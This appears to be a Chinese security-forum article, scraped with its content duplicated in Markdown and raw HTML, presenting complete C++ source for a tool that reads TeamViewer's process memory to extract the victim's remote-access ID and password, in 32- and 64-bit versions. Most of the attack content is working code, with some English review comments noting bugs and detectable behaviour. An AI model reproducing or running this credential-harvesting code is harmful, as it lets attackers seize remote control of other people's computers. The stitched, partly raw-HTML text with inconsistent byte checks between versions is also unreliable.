### EnumProcessModules
```c++
BOOL WINAPI EnumProcessModules(
_In_ HANDLE hProcess, //进程的句柄
_Out_writes_bytes_(cb) HMODULE* lphModule, //存放模块的数组
_In_ DWORD cb, //数组的大小
_Out_ LPDWORD lpcbNeeded //所有模块的存储在lphModule中的字节数
);
```
这个函数主要是用来找到进程的基地址
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-2a9584014afb1340703a79533e15539186eac410.png)
可以看到进程的基地址是偏向上面的,只要往下遍历就好
0x03 实现过程
---------
1. EnumProcessModules得到进程的基地址
2. 用do...while循环配合ZwQueryVirtualMemory得到内存块属性如果不是1FF000就加上内存块的大小跳到下一个内存块如果是的话直接得到模块的基地址然后遍历这个模块的内存
3. 用ReadProcessMemory将内存读出来
4. 用正则表达式加特征匹配内存中的字符
关于最后一点的特征光知道大小只能定位模块还需要知道一些ID密码附近的内存特征
发现ID的前面会有个0x80后面会用0x000x00结尾
密码前面有0x88用0x000x00结尾
还有一个坑点就是unicode的正则表达式匹配没找到特别好的方法
还好这里都是英文和数字只要取出13579位置的值然后放入一个char类型的数组中就可以用正则匹配了
如下
```php
35 00 72 00 6A 00 32 00 61 00 6D 00 35 00 61 00
5rj2am5a unicode
取出1 3 5 7 9 11 13 15存入char类型的数组就可以用正则了
```
0x04 代码实现 x32
-------------
```c++
#include&lt;stdio.h&gt;
#include&lt;Windows.h&gt;
#include &lt;dbghelp.h&gt;
#pragma comment(lib,"dbghelp.lib")
#include &lt;shlwapi.h&gt;
#include "tlhelp32.h"
#include &lt;psapi.h&gt;
#include &lt;regex&gt;
#if _WIN64
_int64 EndAddress = 0x0007FFFFFFFF0000;
#else
int EndAddress = 0X7FFF0000;
#endif //根据位数不同遍历的地址大小不同
using namespace std;
typedef enum _MEMORY_INFORMATION_CLASS {
MemoryBasicInformation,
MemoryWorkingSetList,
MemorySectionName,
MemoryBasicVlmInformation
} MEMORY_INFORMATION_CLASS;
typedef NTSTATUS(WINAPI* fnZwQueryVirtualMemory) (
HANDLE ProcessHandle,
PVOID BaseAddress,
MEMORY_INFORMATION_CLASS MemoryInformationClass,
PVOID MemoryInformation,
SIZE_T MemoryInformationLength,
PSIZE_T ReturnLength
);
int GetPidByName(PCWCHAR procName) {
HANDLE ProcessId = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
if (ProcessId == NULL) {
printf("Fail");
}
PROCESSENTRY32 te32 = { 0 };
te32.dwSize = sizeof(te32);
int number = 0;
if (Process32First(ProcessId, &amp;te32)) {
do {
if (!lstrcmp(te32.szExeFile, procName)) {
//printf("[+] TeamViewer PID: %d", te32.th32ProcessID);
return te32.th32ProcessID;
}
} while (Process32Next(ProcessId, &amp;te32));
}
} //用进程名得到PID
int main() {
MEMORY_BASIC_INFORMATION mbi = { 0 }; //初始化MEMORY_BASIC_INFORMATION结构
fnZwQueryVirtualMemory ZwQueryVirtualMemory = (fnZwQueryVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwQueryVirtualMemory");
//ndtll.dll得到ZwQueryVirtualMemory
if (ZwQueryVirtualMemory == NULL) {
if (ZwQueryVirtualMemory == NULL)
{
printf("没有找到ZwQueryVirtualMemory函数");
system("pause");
return 0;
}
}
//如果为NULL就是没找到
DWORD cbNeeded; //EnumProcessModules参数
HMODULE pModuleIds[1024]; //EnumProcessModules存放模块的数组
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, GetPidByName(L"TeamViewer.exe"));
//TeamViewer.exe进程句柄
EnumProcessModules(hProcess, pModuleIds, sizeof(pModuleIds), &amp;cbNeeded);
int StartAddress = (int)pModuleIds[0];
printf("[+]PEBaseAddress: %p\n", StartAddress); //找到TeamViewer.exe基地址
do {
ZwQueryVirtualMemory(hProcess, (LPVOID)StartAddress, MemoryBasicInformation, &amp;mbi, sizeof(mbi), NULL); //从基地址开始遍历将内存信息存放MEMORY_BASIC_INFORMATION结构
if (mbi.RegionSize == 0x1FF000) { //查看内存大小是否为1FF000
int id_temp = 0; //临时变量找到了就改为1避免重复读取
char password_temp = 0; //同上
printf("[+]BaseAddress: %p\n", mbi.BaseAddress); //模块基地址
for (int i = 0; i &lt; 0x1FF000; i++) {
char id[0x17]; //存放id的char数组因为是unicode字符所以要双倍大小加上前面的0x80和后面的0x000x00
char id_char[0xA] = {0}; //unicode转换为ASCII存放的数组
char password[0x15]; //存放密码的unicode数组加上前面的0x88和后面的0x000x00
char password_char[0x9] = {0}; //同上
ReadProcessMemory(hProcess, (LPVOID)((int)mbi.BaseAddress + i), password, 0x15, NULL);
ReadProcessMemory(hProcess, (LPVOID)((int)mbi.BaseAddress + i), id, 0x17, NULL);
//内存中读出数据
for (int x = 0; x &lt;= 0x8; x++) {
password_char[x] = password[ x * 2 + 2 ];
}
//将0x00去除写入password_char数组
password_char[8] = '\x00'; //最后加上\x00结尾
if (password[1] == 0xffffff88 &amp;&amp; password[17] == 0 &amp;&amp; password[18] == 0 &amp;&amp; regex_match(password_char, regex("[0-9a-z]{8}"))) {
printf("[+]password: %s\n", password_char);
password_temp = 1;
}
//判断password[1]是否为0x8817,18位是否为00最后正则匹配password_char
for (int x = 0; x &lt;= 0x9; x++) {
id_char[x] = password[x * 2 + 2];
}
//同上
id_char[9] = '\x00';
if (id_temp == 0 &amp;&amp; id[1] == 0xffffff80 &amp;&amp; id[19] == 0 &amp;&amp; id[20] == 0 &amp;&amp; regex_match(id_char, regex("[0-9]{9}"))) {
printf("[+]id: %s\n", id_char);
id_temp = 1;
}
//这里和上面差不多id_temp == 0 是因为ID会出现多个相同的值所以只要取到一次就不用再取了
if (id_temp == 1 &amp;&amp; password_temp == 1) {
break;
}
//如果id_temp和password_temp都为1说明已经都取到了就可以跳出循环了
}
break;
}
StartAddress += mbi.RegionSize; //不是就加上当前内存块大小继续遍历
} while (StartAddress &lt;= EndAddress);
}
```
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-077be43d4d69a3a8cefc456749787b9d146c0dbb.png)
0x05 代码实现 x64
-------------
64位中线程的内存地址都比进程基址小了就是存有ID密码的内存都到进程上面了
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-89ff731e0adcb4e3d75c02646a7e26cf394b0a4d.png)
都是7FFE0000开始这样就不用先得到进程基址可以直接遍历
还有在64位中密码开头的数字变成了0x90这也是需要改下的别的基本都是相同的
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-d13085f352250d13f0003fc20797e800545d7f1f.png)
贴一下修改后的代码
```c++
#include&lt;stdio.h&gt;
#include&lt;Windows.h&gt;
#include &lt;dbghelp.h&gt;
#pragma comment(lib,"dbghelp.lib")
#include &lt;shlwapi.h&gt;
#include "tlhelp32.h"
#include &lt;psapi.h&gt;
#include &lt;regex&gt;
#if _WIN64
_int64 EndAddress = 0x0007FFFFFFFF0000;
#else
int EndAddress = 0X7FFF0000;
#endif //根据位数不同遍历的地址大小不同
using namespace std;
typedef enum _MEMORY_INFORMATION_CLASS {
MemoryBasicInformation,
MemoryWorkingSetList,
MemorySectionName,
MemoryBasicVlmInformation
} MEMORY_INFORMATION_CLASS;
typedef NTSTATUS(WINAPI* fnZwQueryVirtualMemory) (
HANDLE ProcessHandle,
PVOID BaseAddress,
MEMORY_INFORMATION_CLASS MemoryInformationClass,
PVOID MemoryInformation,
SIZE_T MemoryInformationLength,
PSIZE_T ReturnLength
);
int GetPidByName(PCWCHAR procName) {
HANDLE ProcessId = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
if (ProcessId == NULL) {
printf("Fail");
}
PROCESSENTRY32 te32 = { 0 };
te32.dwSize = sizeof(te32);
int number = 0;
if (Process32First(ProcessId, &amp;te32)) {
do {
if (!lstrcmp(te32.szExeFile, procName)) {
printf("[+]TeamViewer PID: %d\n", te32.th32ProcessID);
return te32.th32ProcessID;
}
} while (Process32Next(ProcessId, &amp;te32));
}
} //用进程名得到PID
int main() {
// Entry point. Resolves ZwQueryVirtualMemory from ntdll.dll, opens
// TeamViewer.exe with PROCESS_ALL_ACCESS, walks its address space from
// 0x7FFE0000 upward until a region of exactly 0x1FF000 bytes is found, then
// scans that region byte by byte for the ID / password byte patterns the
// article describes. From a defender's point of view the observable
// behaviour is a full-access cross-process handle to TeamViewer.exe followed
// by a dense ReadProcessMemory sweep of one region -- a pattern host
// monitoring can flag.
MEMORY_BASIC_INFORMATION mbi = { 0 }; // zero-initialised; refilled by each ZwQueryVirtualMemory call
// Resolve ZwQueryVirtualMemory from ntdll.dll at runtime.
fnZwQueryVirtualMemory ZwQueryVirtualMemory = (fnZwQueryVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwQueryVirtualMemory");
// NULL means the export was not found. The inner check repeats the outer one
// and is redundant.
if (ZwQueryVirtualMemory == NULL) {
if (ZwQueryVirtualMemory == NULL)
{
printf("没有找到ZwQueryVirtualMemory函数");
system("pause");
return 0;
}
}
// NOTE(review): hProcess is neither checked for NULL nor closed; if
// OpenProcess fails, every later call on it fails silently because no return
// value below is examined.
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, GetPidByName(L"TeamViewer.exe"));
_int64 StartAddress = 0x000000007FFE0000; // 64-bit start address the article observed for the scan
do {
// Describe the region containing StartAddress into mbi.
// NOTE(review): the NTSTATUS is ignored, so on failure mbi keeps its
// previous contents (all zeros on the first iteration, in which case
// StartAddress never advances and the loop spins).
ZwQueryVirtualMemory(hProcess, (LPVOID)StartAddress, MemoryBasicInformation, &amp;mbi, sizeof(mbi), NULL);
if (mbi.RegionSize == 0x1FF000) { // region size is the only fingerprint used to pick the region
int id_temp = 0; // set to 1 once an ID has been printed, to avoid repeats
char password_temp = 0; // same for the password
for (int i = 0; i &lt; 0x1FF000; i++) {
char id[0x17]; // raw bytes for the ID: UTF-16 digits plus the leading marker byte and trailing 0x00 0x00
char id_char[0xA] = { 0 }; // ID narrowed to single-byte characters
char password[0x15]; // raw bytes for the password: UTF-16 text plus marker byte and trailing 0x00 0x00
char password_char[0x9] = { 0 }; // password narrowed to single-byte characters
// NOTE(review): both reads target the same address and neither return
// value is checked; after a failed read the stack arrays are left
// uninitialised and the comparisons below run on garbage.
ReadProcessMemory(hProcess, (LPVOID)((_int64)mbi.BaseAddress + i), password, 0x15, NULL);
ReadProcessMemory(hProcess, (LPVOID)((_int64)mbi.BaseAddress + i), id, 0x17, NULL);
// Keep every second byte, skipping the two leading bytes (the article's
// hex dump shows UTF-16LE, so these are the low bytes of each code unit).
for (int x = 0; x &lt;= 0x8; x++) {
password_char[x] = password[x * 2 + 2];
}
password_char[8] = '\x00'; // NUL-terminate; overwrites the ninth copied byte
// Byte 1 must be 0x90, bytes 17/18 must be the 0x00 0x00 terminator, and
// the narrowed text must be exactly 8 lowercase alphanumerics. The first
// equality appears to rely on char being signed so that byte 0x90 promotes
// to 0xffffff90.
if (password[1] == 0xffffff90 &amp;&amp; password[17] == 0 &amp;&amp; password[18] == 0 &amp;&amp; regex_match(password_char, regex("[0-9a-z]{8}"))) {
printf("[+]password: %s\n", password_char);
password_temp = 1;
}
// Same narrowing for the ID. It is copied from the password buffer, not
// from id; both were read from the same address, so bytes 0..20 coincide.
for (int x = 0; x &lt;= 0x9; x++) {
id_char[x] = password[x * 2 + 2];
}
id_char[9] = '\x00'; // NUL-terminate; overwrites the tenth copied byte
// ID check: byte 0 is 0x20, bytes 19/20 are the terminator, text is 9
// digits. id_temp guards against printing the same ID repeatedly, since
// the article notes it occurs several times in the region.
if (id_temp == 0 &amp;&amp; id[0] == 0x20 &amp;&amp; id[19] == 0 &amp;&amp; id[20] == 0 &amp;&amp; regex_match(id_char, regex("[0-9]{9}"))) {
printf("[+]id: %s\n", id_char);
id_temp = 1;
}
// Stop scanning once both values have been printed.
if (id_temp == 1 &amp;&amp; password_temp == 1) {
break;
}
}
break; // only the first region of this size is scanned
}
StartAddress += mbi.RegionSize; // otherwise skip to the next region
} while (0 &lt;= StartAddress); // ends only via the break above or when the address goes negative
}
```
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-a79774acd10b864f1a97ca934c521143fabe3b85.png)</textarea>
<div id=layer-photos-demo>
<div id=md_view><div class=markdown-body><p blockindex=0>最近看到通过窗体获取 TV 账号密码的方法在最新版中已经不能用了。</p>
<p blockindex=1>于是就想写个工具，通过读取内存来得到账号密码。</p>
<h2 blockindex=2>0x01 通过CE搜索账号密码存在的内存块</h2>
<p blockindex=3>类型设置为文本选择unicode编码多搜索几次找到这个值</p>
<p blockindex=4><img src=
<p blockindex=5>本来想的是应该有个指针直接指向密码,想把这个指针的基址找到就可以了,但是调了一下好像找不到这个基址</p>
<p blockindex=6>还有ID是不可以修改的定位也不方便想到遍历内存来得到ID和密码</p>
<p blockindex=7>再用CE搜索一下ID</p>
<p blockindex=8><img src=
<p blockindex=9>可以看到在密码的附近都是有很多ID</p>
<p blockindex=10>用的是遍历，可以不用知道具体的位置；剩下的就是要思考怎么让遍历的内存范围更准确。遍历 0000000-7FFF0000 肯定是可以的，但是这样会出现很多误报，因为后面准备使用正则匹配，难免会匹配到别的字符串。</p>
<p blockindex=11>先用x32dbg查看下内存的属性</p>
<p blockindex=12><img src="
<p blockindex=13>从 CE 上看，ID 和密码就在这块内存里面。这里有个特征：这块内存的大小是 1FF000，后面会用到。</p>
<p blockindex=14>那么思路就是：先得到进程的基址，然后遍历所有内存块的基址，找到一个大小为 1FF000 的内存块，再遍历其内部内容得到 ID 和密码。这样遍历的内存不会很大，也可以降低匹配误差。</p>
<h2 blockindex=15>0x02 需要用到的函数和结构</h2>
<p blockindex=16>下面介绍一下需要用到的函数和结构</p>
<h3 blockindex=17>ZwQueryVirtualMemory</h3>
<pre blockindex=18><code class="hljs language-c++"><span class=hljs-function><span class=hljs-keyword>typedef</span> <span class=hljs-title>NTSTATUS</span><span class=hljs-params>(WINAPI* fnZwQueryVirtualMemory)</span> <span class=hljs-params>(
HANDLE ProcessHandle, <span class=hljs-comment>//进程句柄</span>
PVOID BaseAddress, <span class=hljs-comment>//内存地址</span>
MEMORY_INFORMATION_CLASS MemoryInformationClass, <span class=hljs-comment>//选择需要的内存信息,下面介绍</span>
PVOID MemoryInformation, <span class=hljs-comment>//指向MEMORY_BASIC_INFORMATION结构的指针</span>
SIZE_T MemoryInformationLength, <span class=hljs-comment>//MEMORY_BASIC_INFORMATION结构的大小</span>
PSIZE_T ReturnLength <span class=hljs-comment>//返回结构的大小</span>
)</span></span>;
</code></pre>
<p blockindex=19>这个函数就是获取内存块的属性然后存放到MEMORY_BASIC_INFORMATION结构</p>
<h3 blockindex=20>MemoryInformationClass</h3>
<pre blockindex=21><code class="hljs language-c++"><span class=hljs-keyword>typedef</span> <span class=hljs-class><span class=hljs-keyword>enum</span> _<span class=hljs-title>MEMORY_INFORMATION_CLASS</span> {</span>
MemoryBasicInformation,
MemoryWorkingSetList,
MemorySectionName,
MemoryBasicVlmInformation
} MEMORY_INFORMATION_CLASS;
</code></pre>
<p blockindex=22>这是一个枚举类型，用来选择需要什么内存信息。这里需要遍历内存，选择 MemoryBasicInformation 就可以。</p>
<h3 blockindex=23>MEMORY_BASIC_INFORMATION</h3>
<pre blockindex=24><code class="hljs language-c++"><span class=hljs-keyword>typedef</span> <span class=hljs-class><span class=hljs-keyword>struct</span> _<span class=hljs-title>MEMORY_BASIC_INFORMATION</span> {</span>
PVOID BaseAddress; <span class=hljs-comment>//内存块的起始地址</span>
PVOID AllocationBase; <span class=hljs-comment>//指向VirtualAlloc函数等开辟的内存的地址的指针</span>
DWORD AllocationProtect;
<span class=hljs-comment>//内存块的初始属性,打个比方开了一块内存赋予RW属性就算后面用VirtualProtect修改为RWX这里也是RW是这个内存初始时候的属性</span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>if</span> defined (_WIN64)</span>
WORD PartitionId; <span class=hljs-comment>//不知道msdn没写</span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>endif</span></span>
SIZE_T RegionSize; <span class=hljs-comment>//内存块的大小</span>
DWORD State; <span class=hljs-comment>//内存块的状态</span>
DWORD Protect; <span class=hljs-comment>//内存块当前的属性</span>
DWORD Type; <span class=hljs-comment>//内存块的类型</span>
} MEMORY_BASIC_INFORMATION, *PMEMORY_BASIC_INFORMATION;
</code></pre>
<h3 blockindex=25>EnumProcessModules</h3>
<pre blockindex=26><code class="hljs language-c++"><span class=hljs-function>BOOL WINAPI <span class=hljs-title>EnumProcessModules</span><span class=hljs-params>(
_In_ HANDLE hProcess, <span class=hljs-comment>//进程的句柄</span>
_Out_writes_bytes_(cb) HMODULE* lphModule, <span class=hljs-comment>//存放模块的数组</span>
_In_ DWORD cb, <span class=hljs-comment>//数组的大小</span>
_Out_ LPDWORD lpcbNeeded <span class=hljs-comment>//所有模块的存储在lphModule中的字节数</span>
)</span></span>;
</code></pre>
<p blockindex=27>这个函数主要是用来找到进程的基地址</p>
<p blockindex=28><img src="
<p blockindex=29>可以看到进程的基地址是偏向上面的,只要往下遍历就好</p>
<h2 blockindex=30>0x03 实现过程</h2>
<ol blockindex=31>
<li>EnumProcessModules得到进程的基地址</li>
<li>用 do...while 循环配合 ZwQueryVirtualMemory 得到内存块属性：如果大小不是 1FF000，就加上内存块的大小跳到下一个内存块；如果是，就直接得到模块的基地址，然后遍历这个模块的内存</li>
<li>用ReadProcessMemory将内存读出来</li>
<li>用正则表达式加特征匹配内存中的字符</li>
</ol>
<p blockindex=32>关于最后一点的特征：光知道大小只能定位模块，还需要知道一些 ID 和密码附近的内存特征。</p>
<p blockindex=33>发现 ID 的前面会有一个 0x80，后面以 0x00 0x00 结尾。</p>
<p blockindex=34>密码前面有 0x88，以 0x00 0x00 结尾。</p>
<p blockindex=35>还有一个坑点：unicode 的正则表达式匹配没找到特别好的方法。</p>
<p blockindex=36>还好这里都是英文和数字，只要取出 1、3、5、7、9… 位置的值，放入一个 char 类型的数组中，就可以用正则匹配了。</p>
<p blockindex=37>如下</p>
<pre blockindex=38><code class="hljs language-php"><span class=hljs-number>35</span> <span class=hljs-number>00</span> <span class=hljs-number>72</span> <span class=hljs-number>00</span> <span class=hljs-number>6</span>A <span class=hljs-number>00</span> <span class=hljs-number>32</span> <span class=hljs-number>00</span> <span class=hljs-number>61</span> <span class=hljs-number>00</span> <span class=hljs-number>6</span>D <span class=hljs-number>00</span> <span class=hljs-number>35</span> <span class=hljs-number>00</span> <span class=hljs-number>61</span> <span class=hljs-number>00</span>
<span class=hljs-number>5</span>rj2am5a unicode
取出<span class=hljs-number>1</span> <span class=hljs-number>3</span> <span class=hljs-number>5</span> <span class=hljs-number>7</span> <span class=hljs-number>9</span> <span class=hljs-number>11</span> <span class=hljs-number>13</span> <span class=hljs-number>15</span>存入char类型的数组就可以用正则了
</code></pre>
<h2 blockindex=39>0x04 代码实现 x32</h2>
<pre blockindex=40><code class="hljs language-c++"><span class=hljs-meta>#<span class=hljs-meta-keyword>include</span><span class=hljs-meta-string>&lt;stdio.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span><span class=hljs-meta-string>&lt;Windows.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;dbghelp.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>pragma</span> comment(lib,<span class=hljs-meta-string>"dbghelp.lib"</span>)</span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;shlwapi.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>"tlhelp32.h"</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;psapi.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;regex&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>if</span> _WIN64</span>
_int64 EndAddress = <span class=hljs-number>0x0007FFFFFFFF0000</span>;
<span class=hljs-meta>#<span class=hljs-meta-keyword>else</span></span>
<span class=hljs-keyword>int</span> EndAddress = <span class=hljs-number>0X7FFF0000</span>;
<span class=hljs-meta>#<span class=hljs-meta-keyword>endif</span> <span class=hljs-comment>//根据位数不同遍历的地址大小不同</span></span>
<span class=hljs-keyword>using</span> <span class=hljs-keyword>namespace</span> std;
<span class=hljs-keyword>typedef</span> <span class=hljs-class><span class=hljs-keyword>enum</span> _<span class=hljs-title>MEMORY_INFORMATION_CLASS</span> {</span>
MemoryBasicInformation,
MemoryWorkingSetList,
MemorySectionName,
MemoryBasicVlmInformation
} MEMORY_INFORMATION_CLASS;
<span class=hljs-function><span class=hljs-keyword>typedef</span> <span class=hljs-title>NTSTATUS</span><span class=hljs-params>(WINAPI* fnZwQueryVirtualMemory)</span> <span class=hljs-params>(
HANDLE ProcessHandle,
PVOID BaseAddress,
MEMORY_INFORMATION_CLASS MemoryInformationClass,
PVOID MemoryInformation,
SIZE_T MemoryInformationLength,
PSIZE_T ReturnLength
)</span></span>;
<span class=hljs-function><span class=hljs-keyword>int</span> <span class=hljs-title>GetPidByName</span><span class=hljs-params>(PCWCHAR procName)</span> </span>{
HANDLE ProcessId = <span class=hljs-built_in>CreateToolhelp32Snapshot</span>(TH32CS_SNAPPROCESS, <span class=hljs-literal>NULL</span>);
<span class=hljs-keyword>if</span> (ProcessId == <span class=hljs-literal>NULL</span>) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"Fail"</span>);
}
PROCESSENTRY32 te32 = { <span class=hljs-number>0</span> };
te32.dwSize = <span class=hljs-built_in><span class=hljs-keyword>sizeof</span></span>(te32);
<span class=hljs-keyword>int</span> number = <span class=hljs-number>0</span>;
<span class=hljs-keyword>if</span> (<span class=hljs-built_in>Process32First</span>(ProcessId, &amp;te32)) {
<span class=hljs-keyword>do</span> {
<span class=hljs-keyword>if</span> (!<span class=hljs-built_in>lstrcmp</span>(te32.szExeFile, procName)) {
<span class=hljs-comment>//printf("[+] TeamViewer PID: %d", te32.th32ProcessID);</span>
<span class=hljs-keyword>return</span> te32.th32ProcessID;
}
} <span class=hljs-keyword>while</span> (<span class=hljs-built_in>Process32Next</span>(ProcessId, &amp;te32));
}
} <span class=hljs-comment>//用进程名得到PID</span>
<span class=hljs-function><span class=hljs-keyword>int</span> <span class=hljs-title>main</span><span class=hljs-params>()</span> </span>{
MEMORY_BASIC_INFORMATION mbi = { <span class=hljs-number>0</span> }; <span class=hljs-comment>//初始化MEMORY_BASIC_INFORMATION结构</span>
fnZwQueryVirtualMemory ZwQueryVirtualMemory = (fnZwQueryVirtualMemory)<span class=hljs-built_in>GetProcAddress</span>(<span class=hljs-built_in>GetModuleHandleA</span>(<span class=hljs-string>"ntdll.dll"</span>), <span class=hljs-string>"ZwQueryVirtualMemory"</span>);
<span class=hljs-comment>//从ntdll.dll得到ZwQueryVirtualMemory</span>
<span class=hljs-keyword>if</span> (ZwQueryVirtualMemory == <span class=hljs-literal>NULL</span>) {
<span class=hljs-keyword>if</span> (ZwQueryVirtualMemory == <span class=hljs-literal>NULL</span>)
{
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"没有找到ZwQueryVirtualMemory函数"</span>);
<span class=hljs-built_in>system</span>(<span class=hljs-string>"pause"</span>);
<span class=hljs-keyword>return</span> <span class=hljs-number>0</span>;
}
}
<span class=hljs-comment>//如果为NULL就是没找到</span>
DWORD cbNeeded; <span class=hljs-comment>//EnumProcessModules参数</span>
HMODULE pModuleIds[<span class=hljs-number>1024</span>]; <span class=hljs-comment>//EnumProcessModules存放模块的数组</span>
HANDLE hProcess = <span class=hljs-built_in>OpenProcess</span>(PROCESS_ALL_ACCESS, <span class=hljs-number>0</span>, <span class=hljs-built_in>GetPidByName</span>(<span class=hljs-string>L"TeamViewer.exe"</span>));
<span class=hljs-comment>//TeamViewer.exe进程句柄</span>
<span class=hljs-built_in>EnumProcessModules</span>(hProcess, pModuleIds, <span class=hljs-built_in><span class=hljs-keyword>sizeof</span></span>(pModuleIds), &amp;cbNeeded);
<span class=hljs-keyword>int</span> StartAddress = (<span class=hljs-keyword>int</span>)pModuleIds[<span class=hljs-number>0</span>];
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]PEBaseAddress: %p\n"</span>, StartAddress); <span class=hljs-comment>//找到TeamViewer.exe基地址</span>
<span class=hljs-keyword>do</span> {
<span class=hljs-built_in>ZwQueryVirtualMemory</span>(hProcess, (LPVOID)StartAddress, MemoryBasicInformation, &amp;mbi, <span class=hljs-built_in><span class=hljs-keyword>sizeof</span></span>(mbi), <span class=hljs-literal>NULL</span>); <span class=hljs-comment>//从基地址开始遍历将内存信息存放MEMORY_BASIC_INFORMATION结构</span>
<span class=hljs-keyword>if</span> (mbi.RegionSize == <span class=hljs-number>0x1FF000</span>) { <span class=hljs-comment>//查看内存大小是否为1FF000</span>
<span class=hljs-keyword>int</span> id_temp = <span class=hljs-number>0</span>; <span class=hljs-comment>//临时变量找到了就改为1避免重复读取</span>
<span class=hljs-keyword>char</span> password_temp = <span class=hljs-number>0</span>; <span class=hljs-comment>//同上</span>
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]BaseAddress: %p\n"</span>, mbi.BaseAddress); <span class=hljs-comment>//模块基地址</span>
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>int</span> i = <span class=hljs-number>0</span>; i &lt; <span class=hljs-number>0x1FF000</span>; i++) {
<span class=hljs-keyword>char</span> id[<span class=hljs-number>0x17</span>]; <span class=hljs-comment>//存放id的char数组因为是unicode字符所以要双倍大小加上前面的0x80和后面的0x000x00</span>
<span class=hljs-keyword>char</span> id_char[<span class=hljs-number>0xA</span>] = {<span class=hljs-number>0</span>}; <span class=hljs-comment>//unicode转换为ASCII存放的数组</span>
<span class=hljs-keyword>char</span> password[<span class=hljs-number>0x15</span>]; <span class=hljs-comment>//存放密码的unicode数组加上前面的0x88和后面的0x000x00</span>
<span class=hljs-keyword>char</span> password_char[<span class=hljs-number>0x9</span>] = {<span class=hljs-number>0</span>}; <span class=hljs-comment>//同上</span>
<span class=hljs-built_in>ReadProcessMemory</span>(hProcess, (LPVOID)((<span class=hljs-keyword>int</span>)mbi.BaseAddress + i), password, <span class=hljs-number>0x15</span>, <span class=hljs-literal>NULL</span>);
<span class=hljs-built_in>ReadProcessMemory</span>(hProcess, (LPVOID)((<span class=hljs-keyword>int</span>)mbi.BaseAddress + i), id, <span class=hljs-number>0x17</span>, <span class=hljs-literal>NULL</span>);
<span class=hljs-comment>//内存中读出数据</span>
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>int</span> x = <span class=hljs-number>0</span>; x &lt;= <span class=hljs-number>0x8</span>; x++) {
password_char[x] = password[ x * <span class=hljs-number>2</span> + <span class=hljs-number>2</span> ];
}
<span class=hljs-comment>//将0x00去除写入password_char数组</span>
password_char[<span class=hljs-number>8</span>] = <span class=hljs-string>'\x00'</span>; <span class=hljs-comment>//最后加上\x00结尾</span>
<span class=hljs-keyword>if</span> (password[<span class=hljs-number>1</span>] == <span class=hljs-number>0xffffff88</span> &amp;&amp; password[<span class=hljs-number>17</span>] == <span class=hljs-number>0</span> &amp;&amp; password[<span class=hljs-number>18</span>] == <span class=hljs-number>0</span> &amp;&amp; <span class=hljs-built_in>regex_match</span>(password_char, <span class=hljs-built_in>regex</span>(<span class=hljs-string>"[0-9a-z]{8}"</span>))) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]password: %s\n"</span>, password_char);
password_temp = <span class=hljs-number>1</span>;
}
<span class=hljs-comment>//判断password[1]是否为0x8817,18位是否为00最后正则匹配password_char</span>
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>int</span> x = <span class=hljs-number>0</span>; x &lt;= <span class=hljs-number>0x9</span>; x++) {
id_char[x] = password[x * <span class=hljs-number>2</span> + <span class=hljs-number>2</span>];
}
<span class=hljs-comment>//同上</span>
id_char[<span class=hljs-number>9</span>] = <span class=hljs-string>'\x00'</span>;
<span class=hljs-keyword>if</span> (id_temp == <span class=hljs-number>0</span> &amp;&amp; id[<span class=hljs-number>1</span>] == <span class=hljs-number>0xffffff80</span> &amp;&amp; id[<span class=hljs-number>19</span>] == <span class=hljs-number>0</span> &amp;&amp; id[<span class=hljs-number>20</span>] == <span class=hljs-number>0</span> &amp;&amp; <span class=hljs-built_in>regex_match</span>(id_char, <span class=hljs-built_in>regex</span>(<span class=hljs-string>"[0-9]{9}"</span>))) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]id: %s\n"</span>, id_char);
id_temp = <span class=hljs-number>1</span>;
}
<span class=hljs-comment>//这里和上面差不多id_temp == 0 是因为ID会出现多个相同的值所以只要取到一次就不用再取了</span>
<span class=hljs-keyword>if</span> (id_temp == <span class=hljs-number>1</span> &amp;&amp; password_temp == <span class=hljs-number>1</span>) {
<span class=hljs-keyword>break</span>;
}
<span class=hljs-comment>//如果id_temp和password_temp都为1说明已经都取到了就可以跳出循环了</span>
}
<span class=hljs-keyword>break</span>;
}
StartAddress += mbi.RegionSize; <span class=hljs-comment>//不是就加上当前内存块大小继续遍历</span>
} <span class=hljs-keyword>while</span> (StartAddress &lt;= EndAddress);
}
</code></pre>
<p blockindex=41><img src="
<h2 blockindex=42>0x05 代码实现 x64</h2>
<p blockindex=43>64 位中线程的内存地址都比进程基址小了，也就是存有 ID 和密码的内存都到进程上面了。</p>
<p blockindex=44><img src="
<p blockindex=45>都是从 7FFE0000 开始，这样就不用先得到进程基址，可以直接遍历。</p>
<p blockindex=46>还有，在 64 位中密码开头的数字变成了 0x90，这也是需要改一下的；别的基本都是相同的。</p>
<p blockindex=47><img src="
